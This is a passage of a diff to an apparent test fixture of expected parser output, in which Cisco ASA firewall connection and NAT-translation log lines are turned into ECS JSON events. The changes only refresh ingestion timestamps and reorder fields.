@@ -11862,7 +11862,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:33:41.995625200Z", + "ingested": "2021-12-14T14:38:25.938958471Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11815 for outside:192.168.98.165/80 to inside:172.31.98.44/1288 duration 0:00:00 bytes 945 TCP FINs", "code": "302014", "kind": "event", @@ -11947,7 +11947,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:33:41.995632300Z", + "ingested": "2021-12-14T14:38:25.938959082Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11813 for outside:192.168.98.165/80 to inside:172.31.98.44/1287 duration 0:00:00 bytes 13284 TCP FINs", "code": "302014", "kind": "event", @@ -12030,7 +12030,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995636700Z", + "ingested": "2021-12-14T14:38:25.938959548Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11818 for outside:192.168.100.4/53 (192.168.100.4/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -12115,7 +12115,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:33:41.995641800Z", + "ingested": "2021-12-14T14:38:25.938960028Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11818 for outside:192.168.100.4/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104", "code": "302016", "kind": "event", @@ -12197,7 +12197,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995648300Z", + "ingested": "2021-12-14T14:38:25.938960499Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1290 to outside:192.168.98.44/8294", "code": "305011", "kind": "event", 
@@ -12276,7 +12276,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995653200Z", + "ingested": "2021-12-14T14:38:25.938960954Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11819 for outside:192.168.198.25/80 (192.168.198.25/80) to inside:172.31.98.44/1290 (172.31.98.44/1290)", "code": "302013", "kind": "event", @@ -12361,7 +12361,7 @@ "event": { "severity": 6, "duration": 3526000000000, - "ingested": "2021-12-09T13:33:41.995657900Z", + "ingested": "2021-12-14T14:38:25.938961507Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 9828 for outside:192.168.48.1/67 to NP Identity Ifc:255.255.255.255/68 duration 0:58:46 bytes 58512", "code": "302016", "kind": "event", @@ -12385,22 +12385,16 @@ } }, { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -12410,12 +12404,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995661900Z", + "ingested": "2021-12-14T14:38:25.938962304Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1272 to outside:192.168.98.44/8276 duration 0:00:30", "code": "305012", "kind": "event", @@ -12429,7 +12426,10 @@ }, "cisco": { "asa": {} - } + }, + "tags": [ + "preserve_original_event" + ] }, { "process": { 
@@ -12491,7 +12491,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995666800Z", + "ingested": "2021-12-14T14:38:25.938962768Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11820 for outside:192.168.3.39/53 (192.168.3.39/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -12575,7 +12575,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995673100Z", + "ingested": "2021-12-14T14:38:25.938963240Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11821 for outside:192.168.162.30/53 (192.168.162.30/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -12660,7 +12660,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:33:41.995679400Z", + "ingested": "2021-12-14T14:38:25.938963693Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11820 for outside:192.168.3.39/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 168", "code": "302016", "kind": "event", @@ -12743,7 +12743,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995685600Z", + "ingested": "2021-12-14T14:38:25.938964171Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11822 for outside:192.168.3.39/53 (192.168.3.39/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -12828,7 +12828,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:33:41.995691800Z", + "ingested": "2021-12-14T14:38:25.938964849Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11821 for outside:192.168.162.30/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 198", "code": "302016", "kind": "event", 
@@ -12912,7 +12912,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:33:41.995698Z", + "ingested": "2021-12-14T14:38:25.938965318Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11822 for outside:192.168.3.39/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 150", "code": "302016", "kind": "event", @@ -12995,7 +12995,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995704300Z", + "ingested": "2021-12-14T14:38:25.938965780Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11823 for outside:192.168.48.186/53 (192.168.48.186/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -13080,7 +13080,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:33:41.995710400Z", + "ingested": "2021-12-14T14:38:25.938966272Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11823 for outside:192.168.48.186/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 84", "code": "302016", "kind": "event", @@ -13162,7 +13162,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995716700Z", + "ingested": "2021-12-14T14:38:25.938966742Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1291 to outside:192.168.98.44/8295", "code": "305011", "kind": "event", @@ -13241,7 +13241,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995722900Z", + "ingested": "2021-12-14T14:38:25.938967206Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11824 for outside:192.168.54.190/80 (192.168.54.190/80) to inside:172.31.98.44/1291 (172.31.98.44/1291)", "code": "302013", "kind": "event", 
@@ -13325,7 +13325,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995729500Z", + "ingested": "2021-12-14T14:38:25.938968382Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11825 for outside:192.168.254.94/53 (192.168.254.94/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -13410,7 +13410,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:33:41.995735900Z", + "ingested": "2021-12-14T14:38:25.938968866Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11825 for outside:192.168.254.94/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 188", "code": "302016", "kind": "event", @@ -13492,7 +13492,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995742200Z", + "ingested": "2021-12-14T14:38:25.938969321Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1292 to outside:192.168.98.44/8296", "code": "305011", "kind": "event", @@ -13571,7 +13571,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995748400Z", + "ingested": "2021-12-14T14:38:25.938969798Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11826 for outside:192.168.54.190/80 (192.168.54.190/80) to inside:172.31.98.44/1292 (172.31.98.44/1292)", "code": "302013", "kind": "event", @@ -13654,7 +13654,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995754600Z", + "ingested": "2021-12-14T14:38:25.938970405Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1293 to outside:192.168.98.44/8297", "code": "305011", "kind": "event", 
@@ -13733,7 +13733,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995760900Z", + "ingested": "2021-12-14T14:38:25.938970935Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11827 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1293 (172.31.98.44/1293)", "code": "302013", "kind": "event", @@ -13816,7 +13816,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995765700Z", + "ingested": "2021-12-14T14:38:25.938971397Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1294 to outside:192.168.98.44/8298", "code": "305011", "kind": "event", @@ -13895,7 +13895,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995770800Z", + "ingested": "2021-12-14T14:38:25.938971904Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11828 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1294 (172.31.98.44/1294)", "code": "302013", "kind": "event", @@ -13981,7 +13981,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:33:41.995776400Z", + "ingested": "2021-12-14T14:38:25.938972370Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11827 for outside:192.168.98.165/80 to inside:172.31.98.44/1293 duration 0:00:00 bytes 5964 TCP FINs", "code": "302014", "kind": "event", @@ -14063,7 +14063,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995782Z", + "ingested": "2021-12-14T14:38:25.938972826Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1295 to outside:192.168.98.44/8299", "code": "305011", "kind": "event", 
@@ -14142,7 +14142,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995786300Z", + "ingested": "2021-12-14T14:38:25.938973386Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11829 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1295 (172.31.98.44/1295)", "code": "302013", "kind": "event", @@ -14225,7 +14225,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995791200Z", + "ingested": "2021-12-14T14:38:25.938973845Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1296 to outside:192.168.98.44/8300", "code": "305011", "kind": "event", @@ -14304,7 +14304,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995797500Z", + "ingested": "2021-12-14T14:38:25.938974314Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11830 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1296 (172.31.98.44/1296)", "code": "302013", "kind": "event", @@ -14390,7 +14390,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:33:41.995802300Z", + "ingested": "2021-12-14T14:38:25.938974769Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11828 for outside:192.168.98.165/80 to inside:172.31.98.44/1294 duration 0:00:00 bytes 6694 TCP FINs", "code": "302014", "kind": "event", @@ -14475,7 +14475,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:33:41.995806900Z", + "ingested": "2021-12-14T14:38:25.938975243Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11829 for outside:192.168.98.165/80 to inside:172.31.98.44/1295 duration 0:00:00 bytes 1493 TCP FINs", "code": "302014", "kind": "event", 
@@ -14560,7 +14560,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:33:41.995810800Z", + "ingested": "2021-12-14T14:38:25.938975729Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11830 for outside:192.168.98.165/80 to inside:172.31.98.44/1296 duration 0:00:00 bytes 893 TCP FINs", "code": "302014", "kind": "event", @@ -14642,7 +14642,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995815600Z", + "ingested": "2021-12-14T14:38:25.938976245Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1297 to outside:192.168.98.44/8301", "code": "305011", "kind": "event", @@ -14721,7 +14721,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995821900Z", + "ingested": "2021-12-14T14:38:25.938976719Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11831 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1297 (172.31.98.44/1297)", "code": "302013", "kind": "event", @@ -14804,7 +14804,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995828200Z", + "ingested": "2021-12-14T14:38:25.938977179Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1298 to outside:192.168.98.44/8302", "code": "305011", "kind": "event", @@ -14883,7 +14883,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995834400Z", + "ingested": "2021-12-14T14:38:25.938977634Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11832 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1298 (172.31.98.44/1298)", "code": "302013", "kind": "event", 
@@ -14967,7 +14967,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995840700Z", + "ingested": "2021-12-14T14:38:25.938978106Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11833 for outside:192.168.179.9/53 (192.168.179.9/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -15052,7 +15052,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:33:41.995847Z", + "ingested": "2021-12-14T14:38:25.938978664Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11833 for outside:192.168.179.9/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 150", "code": "302016", "kind": "event", @@ -15137,7 +15137,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:33:41.995853100Z", + "ingested": "2021-12-14T14:38:25.938979233Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11831 for outside:192.168.98.165/80 to inside:172.31.98.44/1297 duration 0:00:00 bytes 2750 TCP FINs", "code": "302014", "kind": "event", @@ -15219,7 +15219,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995859300Z", + "ingested": "2021-12-14T14:38:25.938979703Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1299 to outside:192.168.98.44/8303", "code": "305011", "kind": "event", @@ -15298,7 +15298,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995865500Z", + "ingested": "2021-12-14T14:38:25.938980172Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11834 for outside:192.168.247.99/80 (192.168.247.99/80) to inside:172.31.98.44/1299 (172.31.98.44/1299)", "code": "302013", "kind": "event", 
@@ -15381,7 +15381,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995871800Z", + "ingested": "2021-12-14T14:38:25.938980641Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1300 to outside:192.168.98.44/8304", "code": "305011", "kind": "event", @@ -15460,7 +15460,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995878100Z", + "ingested": "2021-12-14T14:38:25.938981108Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11835 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1300 (172.31.98.44/1300)", "code": "302013", "kind": "event", @@ -15546,7 +15546,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:33:41.995884200Z", + "ingested": "2021-12-14T14:38:25.938981658Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11832 for outside:192.168.98.165/80 to inside:172.31.98.44/1298 duration 0:00:00 bytes 881 TCP FINs", "code": "302014", "kind": "event", @@ -15631,7 +15631,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:33:41.995890600Z", + "ingested": "2021-12-14T14:38:25.938982120Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11835 for outside:192.168.98.165/80 to inside:172.31.98.44/1300 duration 0:00:00 bytes 2202 TCP FINs", "code": "302014", "kind": "event", @@ -15713,7 +15713,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995898500Z", + "ingested": "2021-12-14T14:38:25.938982582Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1301 to outside:192.168.98.44/8305", "code": "305011", "kind": "event", 
@@ -15792,7 +15792,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995905200Z", + "ingested": "2021-12-14T14:38:25.938983045Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11836 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1301 (172.31.98.44/1301)", "code": "302013", "kind": "event", @@ -15875,7 +15875,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995911500Z", + "ingested": "2021-12-14T14:38:25.938983518Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1302 to outside:192.168.98.44/8306", "code": "305011", "kind": "event", @@ -15954,7 +15954,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995917800Z", + "ingested": "2021-12-14T14:38:25.938983998Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11837 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1302 (172.31.98.44/1302)", "code": "302013", "kind": "event", @@ -15979,22 +15979,16 @@ } }, { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" 
@@ -16004,12 +15998,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995924400Z", + "ingested": "2021-12-14T14:38:25.938992257Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1276 to outside:192.168.98.44/8280 duration 0:00:30", "code": "305012", "kind": "event", @@ -16023,25 +16020,22 @@ }, "cisco": { "asa": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -16051,12 +16045,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995929600Z", + "ingested": "2021-12-14T14:38:25.938992955Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1277 to outside:192.168.98.44/8281 duration 0:00:30", "code": "305012", "kind": "event", @@ -16070,25 +16067,22 @@ }, "cisco": { "asa": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" 
@@ -16098,12 +16092,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995934900Z", + "ingested": "2021-12-14T14:38:25.938993421Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1278 to outside:192.168.98.44/8282 duration 0:00:30", "code": "305012", "kind": "event", @@ -16117,25 +16114,22 @@ }, "cisco": { "asa": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -16145,12 +16139,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995941Z", + "ingested": "2021-12-14T14:38:25.938993889Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1279 to outside:192.168.98.44/8283 duration 0:00:30", "code": "305012", "kind": "event", @@ -16164,25 +16161,22 @@ }, "cisco": { "asa": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" 
@@ -16192,12 +16186,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995946200Z", + "ingested": "2021-12-14T14:38:25.938994358Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1280 to outside:192.168.98.44/8284 duration 0:00:30", "code": "305012", "kind": "event", @@ -16211,25 +16208,22 @@ }, "cisco": { "asa": {} - } + }, + "tags": [ + "preserve_original_event" + ] }, { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -16239,12 +16233,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995950600Z", + "ingested": "2021-12-14T14:38:25.938994868Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1281 to outside:192.168.98.44/8285 duration 0:00:30", "code": "305012", "kind": "event", @@ -16258,25 +16255,22 @@ }, "cisco": { "asa": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" 
@@ -16286,12 +16280,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995955600Z", + "ingested": "2021-12-14T14:38:25.938995508Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1282 to outside:192.168.98.44/8286 duration 0:00:30", "code": "305012", "kind": "event", @@ -16305,25 +16302,22 @@ }, "cisco": { "asa": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -16333,12 +16327,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995961900Z", + "ingested": "2021-12-14T14:38:25.938996095Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1283 to outside:192.168.98.44/8287 duration 0:00:30", "code": "305012", "kind": "event", @@ -16352,25 +16349,22 @@ }, "cisco": { "asa": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" 
@@ -16380,12 +16374,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995966600Z", + "ingested": "2021-12-14T14:38:25.938996756Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1284 to outside:192.168.98.44/8288 duration 0:00:30", "code": "305012", "kind": "event", @@ -16399,25 +16396,22 @@ }, "cisco": { "asa": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -16427,12 +16421,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995971600Z", + "ingested": "2021-12-14T14:38:25.938997421Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from 